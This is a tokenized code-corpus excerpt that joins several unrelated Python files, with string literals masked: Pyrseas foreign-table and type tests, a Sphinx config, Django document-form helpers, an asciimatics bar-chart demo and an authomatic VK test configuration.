[ ( fdw , srv , usr ) ] . drop ( ) ) <EOL> return stmts <EOL> class ForeignTable ( DbObjectWithOptions , Table ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> privobjtype = "<STR_LIT>" <EOL> def to_map ( self , opts ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( opts , '<STR_LIT>' ) and opts . excl_tables and self . name in opts . excl_tables : <EOL> return { } <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return { } <EOL> cols = [ ] <EOL> for i in range ( len ( self . columns ) ) : <EOL> col = self . columns [ i ] . to_map ( opts . no_privs ) <EOL> if col : <EOL> cols . append ( col ) <EOL> tbl = { '<STR_LIT>' : cols , '<STR_LIT>' : self . server } <EOL> attrlist = [ '<STR_LIT>' ] <EOL> if self . description is not None : <EOL> attrlist . 
append ( '<STR_LIT:description>' ) <EOL> if not opts . no_owner : <EOL> attrlist . append ( '<STR_LIT>' ) <EOL> for attr in attrlist : <EOL> if hasattr ( self , attr ) : <EOL> tbl . update ( { attr : getattr ( self , attr ) } ) <EOL> if not opts . no_privs and self . privileges : <EOL> tbl . update ( { '<STR_LIT>' : self . map_privs ( ) } ) <EOL> return tbl <EOL> @ grantable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> cols = [ ] <EOL> options = [ ] <EOL> for col in self . columns : <EOL> cols . append ( "<STR_LIT:U+0020>" + col . add ( ) [ <NUM_LIT:0> ] ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> stmts . append ( "<STR_LIT>" % ( <EOL> self . qualname ( ) , "<STR_LIT>" . join ( cols ) , self . server , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ) <EOL> if self . owner is not None : <EOL> stmts . append ( self . alter_owner ( ) ) <EOL> if self . description is not None : <EOL> stmts . append ( self . comment ( ) ) <EOL> for col in self . columns : <EOL> if col . description is not None : <EOL> stmts . append ( col . comment ( ) ) <EOL> return stmts <EOL> def drop ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . objtype , self . identifier ( ) ) <EOL> def diff_map ( self , intable ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignTable , self ) . diff_map ( intable ) <EOL> if intable . owner is not None : <EOL> if intable . owner != self . owner : <EOL> stmts . append ( self . alter_owner ( intable . owner ) ) <EOL> stmts . append ( self . diff_description ( intable ) ) <EOL> return stmts <EOL> class ForeignTableDict ( ClassDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignTable <EOL> query = """<STR_LIT>""" <EOL> def _from_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dbconn . version < <NUM_LIT> : <EOL> return <EOL> for tbl in self . fetch ( ) : <EOL> self [ tbl . 
key ( ) ] = tbl <EOL> def from_map ( self , schema , inobjs , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inobjs : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> ftb = key [ <NUM_LIT> : ] <EOL> self [ ( schema . name , ftb ) ] = ftable = ForeignTable ( <EOL> schema = schema . name , name = ftb ) <EOL> inftable = inobjs [ key ] <EOL> if not inftable : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ftb ) <EOL> try : <EOL> newdb . columns . from_map ( ftable , inftable [ '<STR_LIT>' ] ) <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" % ftb , ) <EOL> raise <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' ] : <EOL> if attr in inftable : <EOL> setattr ( ftable , attr , inftable [ attr ] ) <EOL> if '<STR_LIT>' in inftable : <EOL> ftable . privileges = privileges_from_map ( <EOL> inftable [ '<STR_LIT>' ] , ftable . allprivs , ftable . owner ) <EOL> def link_refs ( self , dbcolumns ) : <EOL> """<STR_LIT>""" <EOL> for ( sch , tbl ) in dbcolumns : <EOL> if ( sch , tbl ) in self : <EOL> assert isinstance ( self [ ( sch , tbl ) ] , ForeignTable ) <EOL> self [ ( sch , tbl ) ] . columns = dbcolumns [ ( sch , tbl ) ] <EOL> for col in dbcolumns [ ( sch , tbl ) ] : <EOL> col . _table = self [ ( sch , tbl ) ] <EOL> def diff_map ( self , intables ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( sch , tbl ) in intables : <EOL> intbl = intables [ ( sch , tbl ) ] <EOL> if ( sch , tbl ) not in self : <EOL> if hasattr ( intbl , '<STR_LIT>' ) : <EOL> oldname = intbl . oldname <EOL> try : <EOL> stmts . append ( self [ ( sch , oldname ) ] . rename ( intbl . name ) ) <EOL> del self [ ( sch , oldname ) ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , intbl . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( intbl . 
create ( ) ) <EOL> for ( sch , tbl ) in self : <EOL> table = self [ ( sch , tbl ) ] <EOL> if ( sch , tbl ) not in intables : <EOL> stmts . append ( table . drop ( ) ) <EOL> else : <EOL> stmts . append ( table . diff_map ( intables [ ( sch , tbl ) ] ) ) <EOL> return stmts </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from pyrseas . testutils import DatabaseToMapTestCase <EOL> from pyrseas . testutils import InputMapToSqlTestCase , fix_indent <EOL> CREATE_COMPOSITE_STMT = "<STR_LIT>" <EOL> CREATE_ENUM_STMT = "<STR_LIT>" <EOL> CREATE_SHELL_STMT = "<STR_LIT>" <EOL> CREATE_FUNC_IN = "<STR_LIT>" "<STR_LIT>" <EOL> CREATE_FUNC_OUT = "<STR_LIT>" "<STR_LIT>" <EOL> CREATE_TYPE_STMT = "<STR_LIT>" <EOL> DROP_STMT = "<STR_LIT>" <EOL> COMMENT_STMT = "<STR_LIT>" <EOL> class CompositeToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_composite ( self ) : <EOL> "<STR_LIT>" <EOL> dbmap = self . to_map ( [ CREATE_COMPOSITE_STMT ] ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } <EOL> def test_dropped_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> stmts = [ CREATE_COMPOSITE_STMT , "<STR_LIT>" ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } <EOL> class CompositeToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_composite ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_COMPOSITE_STMT <EOL> def test_drop_composite ( self ) : <EOL> "<STR_LIT>" <EOL> sql = self . 
to_sql ( self . std_map ( ) , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_rename_composite ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_add_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ "<STR_LIT>" ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_drop_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_drop_attribute_schema ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap . 
update ( { '<STR_LIT>' : { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } } ) <EOL> sql = self . to_sql ( inmap , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_rename_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:y>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> class EnumToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_enum ( self ) : <EOL> "<STR_LIT>" <EOL> dbmap = self . to_map ( [ CREATE_ENUM_STMT ] ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> class EnumToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_enum ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_ENUM_STMT <EOL> def test_drop_enum ( self ) : <EOL> "<STR_LIT>" <EOL> sql = self . to_sql ( self . std_map ( ) , [ CREATE_ENUM_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_rename_enum ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . 
update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_ENUM_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> class BaseTypeToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> superuser = True <EOL> def test_base_type ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> CREATE_TYPE_STMT ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_base_type_category ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:S>' } <EOL> class BaseTypeToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_base_type ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . 
update ( { '<STR_LIT>' : { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:strict>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:source>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:strict>' : True , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_SHELL_STMT <EOL> assert fix_indent ( sql [ <NUM_LIT:1> ] ) == CREATE_FUNC_IN <EOL> assert fix_indent ( sql [ <NUM_LIT:2> ] ) == CREATE_FUNC_OUT <EOL> assert fix_indent ( sql [ <NUM_LIT:3> ] ) == "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> def test_drop_type ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> CREATE_TYPE_STMT ] <EOL> sql = self . to_sql ( self . std_map ( ) , stmts , superuser = True ) <EOL> assert sql == [ "<STR_LIT>" ] </s>
<s> import sys , os <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import datetime <EOL> from django import forms <EOL> import json <EOL> from django . utils . datastructures import SortedDict <EOL> from django . forms . util import ErrorList <EOL> from django . forms . forms import BaseForm , get_declared_fields <EOL> from fields import JsonField , JsonListField <EOL> def save_instance ( form , instance , fields = None , fail_message = '<STR_LIT>' , <EOL> commit = True , exclude = None ) : <EOL> if form . errors : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( '<STR_LIT:object>' , fail_message ) ) <EOL> cleaned_data = form . cleaned_data <EOL> for field_name , field_type in instance . structure . items ( ) : <EOL> if fields and field_name not in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> instance [ field_name ] = cleaned_data [ field_name ] <EOL> if commit : <EOL> instance . save ( validate = True ) <EOL> return instance <EOL> def get_field_type_from_document ( instance , field_name ) : <EOL> field_type = instance . structure [ field_name ] <EOL> if isinstance ( field_type , list ) : <EOL> field_type = list <EOL> if isinstance ( field_type , dict ) : <EOL> field_type = dict <EOL> return field_type <EOL> def value_from_document ( instance , field_name ) : <EOL> field_type = get_field_type_from_document ( instance , field_name ) <EOL> if field_type in [ list , dict ] : <EOL> return json . dumps ( instance [ field_name ] ) <EOL> return instance [ field_name ] <EOL> def document_to_dict ( instance , fields = None , exclude = None ) : <EOL> """<STR_LIT>""" <EOL> structure = instance . structure <EOL> data = { } <EOL> for field_name in structure . 
keys ( ) : <EOL> if fields and not field_name in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> data [ field_name ] = value_from_document ( instance , field_name ) <EOL> return data <EOL> def get_default_form_field_types ( document , field_name , field_type ) : <EOL> default_form_field_types = { <EOL> bool : forms . BooleanField , <EOL> int : forms . IntegerField , <EOL> float : forms . FloatField , <EOL> str : forms . CharField , <EOL> unicode : forms . CharField , <EOL> datetime . datetime : forms . DateTimeField , <EOL> datetime . date : forms . DateField , <EOL> datetime . time : forms . TimeField , <EOL> list : JsonListField , <EOL> dict : JsonField , <EOL> } <EOL> return default_form_field_types [ field_type ] <EOL> def formfield_for_document_field ( document , field_name , <EOL> form_class = forms . CharField , <EOL> ** kwargs ) : <EOL> field_type = get_field_type_from_document ( document , field_name ) <EOL> FormField = get_default_form_field_types ( document , field_name , field_type ) <EOL> defaults = { <EOL> '<STR_LIT>' : field_name in document . required_fields , <EOL> } <EOL> if field_type == list : <EOL> defaults [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if field_type == dict : <EOL> defaults [ '<STR_LIT>' ] = '<STR_LIT:{}>' <EOL> if field_name in document . default_values : <EOL> default_value = document . default_values [ field_name ] <EOL> if callable ( default_value ) : <EOL> default_value = default_value ( ) <EOL> defaults [ '<STR_LIT>' ] = default_value <EOL> defaults . update ( kwargs ) <EOL> formfield = FormField ( ** defaults ) <EOL> return formfield <EOL> def fields_for_document ( document , fields = None , exclude = None , <EOL> formfield_callback = None ) : <EOL> """<STR_LIT>""" <EOL> field_list = [ ] <EOL> structure = document . structure <EOL> for field_name , field_type in structure . 
items ( ) : <EOL> if fields and not field_name in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> form_field = None <EOL> if formfield_callback : <EOL> form_field = formfield_callback ( document , field_name ) <EOL> if not form_field : <EOL> form_field = formfield_for_document_field ( document , field_name ) <EOL> if form_field : <EOL> field_list . append ( ( field_name , form_field ) ) <EOL> field_dict = SortedDict ( field_list ) <EOL> if fields : <EOL> field_dict = SortedDict ( [ ( f , field_dict . get ( f ) ) <EOL> for f in fields <EOL> if ( not exclude ) or ( exclude and f not in exclude ) ] ) <EOL> return field_dict <EOL> class DocumentFormOptions ( object ) : <EOL> def __init__ ( self , options = None ) : <EOL> try : <EOL> self . document = getattr ( options , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> try : <EOL> self . document . collection <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . fields = getattr ( options , '<STR_LIT>' , None ) <EOL> self . exclude = getattr ( options , '<STR_LIT>' , None ) <EOL> class DocumentFormMetaclass ( type ) : <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> formfield_callback = attrs . pop ( '<STR_LIT>' , None ) <EOL> try : <EOL> parents = [ b for b in bases if issubclass ( b , DocumentForm ) ] <EOL> except NameError : <EOL> parents = None <EOL> declared_fields = get_declared_fields ( bases , attrs , False ) <EOL> new_class = super ( DocumentFormMetaclass , cls ) . __new__ ( cls , name , bases , <EOL> attrs ) <EOL> if not parents : <EOL> return new_class <EOL> opts = new_class . _meta = DocumentFormOptions ( <EOL> getattr ( new_class , '<STR_LIT:Meta>' , None ) <EOL> ) <EOL> if opts . document : <EOL> fields = fields_for_document ( opts . document , opts . fields , <EOL> opts . exclude , formfield_callback ) <EOL> fields . 
update ( declared_fields ) <EOL> else : <EOL> fields = declared_fields <EOL> new_class . declared_fields = declared_fields <EOL> new_class . base_fields = fields <EOL> return new_class <EOL> class BaseDocumentForm ( BaseForm ) : <EOL> def __init__ ( self , data = None , files = None , auto_id = '<STR_LIT>' , prefix = None , <EOL> initial = None , error_class = ErrorList , label_suffix = '<STR_LIT::>' , <EOL> empty_permitted = False , instance = None , <EOL> collection = None ) : <EOL> opts = self . _meta <EOL> if instance is None : <EOL> if collection is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . instance = opts . document ( collection = collection ) <EOL> object_data = { } <EOL> else : <EOL> self . instance = instance <EOL> try : <EOL> self . instance . collection <EOL> except AttributeError : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> object_data = document_to_dict ( instance , opts . fields , opts . exclude ) <EOL> if initial is not None : <EOL> object_data . update ( initial ) <EOL> super ( BaseDocumentForm , self ) . __init__ ( <EOL> data , files , auto_id , prefix , object_data , <EOL> error_class , label_suffix , empty_permitted <EOL> ) <EOL> def save ( self , commit = True ) : <EOL> if self . instance . get ( '<STR_LIT>' , None ) is None : <EOL> fail_message = '<STR_LIT>' <EOL> else : <EOL> fail_message = '<STR_LIT>' <EOL> return save_instance ( self , self . instance , self . _meta . fields , <EOL> fail_message , commit , exclude = self . _meta . exclude ) <EOL> save . alters_data = True <EOL> class DocumentForm ( BaseDocumentForm ) : <EOL> __metaclass__ = DocumentFormMetaclass <EOL> def documentform_factory ( document , form = DocumentForm , <EOL> fields = None , exclude = None , <EOL> formfield_callback = None ) : <EOL> try : <EOL> document . 
collection <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> attrs = { '<STR_LIT>' : document } <EOL> if fields is not None : <EOL> attrs [ '<STR_LIT>' ] = fields <EOL> if exclude is not None : <EOL> attrs [ '<STR_LIT>' ] = exclude <EOL> parent = ( object , ) <EOL> if hasattr ( form , '<STR_LIT:Meta>' ) : <EOL> parent = ( form . Meta , object ) <EOL> Meta = type ( '<STR_LIT:Meta>' , parent , attrs ) <EOL> class_name = '<STR_LIT>' % document . __name__ <EOL> form_class_attrs = { <EOL> '<STR_LIT:Meta>' : Meta , <EOL> '<STR_LIT>' : formfield_callback <EOL> } <EOL> return DocumentFormMetaclass ( class_name , ( form , ) , form_class_attrs ) </s>
<s> from django . conf . urls import patterns , include , url <EOL> from . import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . home , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> __author__ = '<STR_LIT>' </s>
<s> from asciimatics . renderers import BarChart <EOL> from asciimatics . screen import Screen <EOL> import sys <EOL> import math <EOL> import time <EOL> from random import randint <EOL> def fn ( ) : <EOL> return randint ( <NUM_LIT:0> , <NUM_LIT> ) <EOL> def wv ( x ) : <EOL> return lambda : <NUM_LIT:1> + math . sin ( math . pi * ( <NUM_LIT:2> * time . time ( ) + x ) / <NUM_LIT:5> ) <EOL> def demo ( ) : <EOL> chart = BarChart ( <NUM_LIT:10> , <NUM_LIT> , [ fn , fn ] , <EOL> char = "<STR_LIT:=>" , <EOL> gradient = [ ( <NUM_LIT:20> , Screen . COLOUR_GREEN ) , <EOL> ( <NUM_LIT:30> , Screen . COLOUR_YELLOW ) , <EOL> ( <NUM_LIT> , Screen . COLOUR_RED ) ] ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT> , <NUM_LIT> , <EOL> [ wv ( <NUM_LIT:1> ) , wv ( <NUM_LIT:2> ) , wv ( <NUM_LIT:3> ) , wv ( <NUM_LIT:4> ) , wv ( <NUM_LIT:5> ) , wv ( <NUM_LIT:7> ) , wv ( <NUM_LIT:8> ) , wv ( <NUM_LIT:9> ) ] , <EOL> colour = Screen . COLOUR_GREEN , <EOL> axes = BarChart . BOTH , <EOL> scale = <NUM_LIT> ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT:7> , <NUM_LIT> , [ lambda : time . time ( ) * <NUM_LIT:10> % <NUM_LIT> ] , <EOL> gradient = [ ( <NUM_LIT:10> , <NUM_LIT> ) , ( <NUM_LIT:20> , <NUM_LIT> ) , ( <NUM_LIT:30> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:50> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) ] , <EOL> char = "<STR_LIT:>>" , <EOL> scale = <NUM_LIT> , <EOL> labels = True , <EOL> axes = BarChart . X_AXIS ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT:10> , <NUM_LIT> , <EOL> [ wv ( <NUM_LIT:1> ) , wv ( <NUM_LIT:2> ) , wv ( <NUM_LIT:3> ) , wv ( <NUM_LIT:4> ) , wv ( <NUM_LIT:5> ) , wv ( <NUM_LIT:7> ) , wv ( <NUM_LIT:8> ) , wv ( <NUM_LIT:9> ) ] , <EOL> colour = [ c for c in range ( <NUM_LIT:1> , <NUM_LIT:8> ) ] , <EOL> scale = <NUM_LIT> , <EOL> axes = BarChart . 
X_AXIS , <EOL> intervals = <NUM_LIT:0.5> , <EOL> labels = True , <EOL> border = False ) <EOL> print ( chart ) <EOL> demo ( ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> import datetime <EOL> import re <EOL> import fixtures <EOL> import constants <EOL> from authomatic . providers import oauth2 <EOL> conf = fixtures . get_configuration ( '<STR_LIT>' ) <EOL> PICTURE = re . compile ( r'<STR_LIT>' ) <EOL> CONFIG = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : oauth2 . VK , <EOL> '<STR_LIT>' : oauth2 . VK . user_info_scope , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:user>' : { <EOL> '<STR_LIT>' : conf . user_birth_date_str , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:email>' : None , <EOL> '<STR_LIT>' : conf . user_first_name , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:id>' : conf . user_id , <EOL> '<STR_LIT>' : conf . user_last_name , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:location>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:name>' : conf . user_name , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : PICTURE , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : re . compile ( 